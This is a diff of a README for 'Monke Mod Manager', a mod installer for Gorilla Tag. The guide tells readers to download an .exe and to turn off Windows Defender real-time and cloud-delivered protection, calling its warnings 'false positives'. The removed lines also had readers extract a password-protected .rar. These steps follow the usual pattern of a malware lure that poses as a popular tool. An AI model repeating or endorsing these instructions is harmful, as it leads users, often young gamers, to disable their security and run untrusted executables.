DeadlyKittenn/MonkeModManager/README.md

 🔧 Monke Mod Manager Full Setup Guide
 Follow these steps to properly install and run Monke Mod Manager with all necessary preparations:

-📥 Step 1: Download Monke Mod Manager
-Go to the official GitHub repository and download the latest .exe file from the Releases section.

-🛡️ Step 2: Disable Windows Defender (Optional but Recommended) Before launching the .exe, it's recommended to temporarily disable Windows Defender to avoid false-positive warnings:
+📥 Step 1: Disable Windows Defender (Optional but Recommended) Before launching the .exe, it's recommended to temporarily disable Windows Defender to avoid false-positive warnings:

-Open Windows Security → Virus & threat protection

-Click Manage settings

-Turn off Real-time protection and Cloud-delivered protection

-This ensures smoother installation and avoids file blocking.

-🗜️ Step 3: Install WinRAR
-Some mods or additional files might come in .rar format.
-If you don’t have WinRAR, download and install it from win-rar.com — it's required for extracting .rar archives.

-🔓 Step 4: Extract with Password
-Open the downloaded archive using WinRAR.
-When prompted, enter the password: monkemodmanager

-🧰 Step 5: Select Your Mods
+🧰 Step 2: Select Your Mods
 Tick the boxes for the mods you want to install (e.g., BananaHook, Utils, Air Jump, etc.).
 Then click Install / Update — the tool will download and install them for you.

-🔁 Step 6: Launch Gorilla Tag
-Start the game as usual — your selected mods should now be active.
-You can reopen Monke Mod Manager anytime to add/remove/update your mods.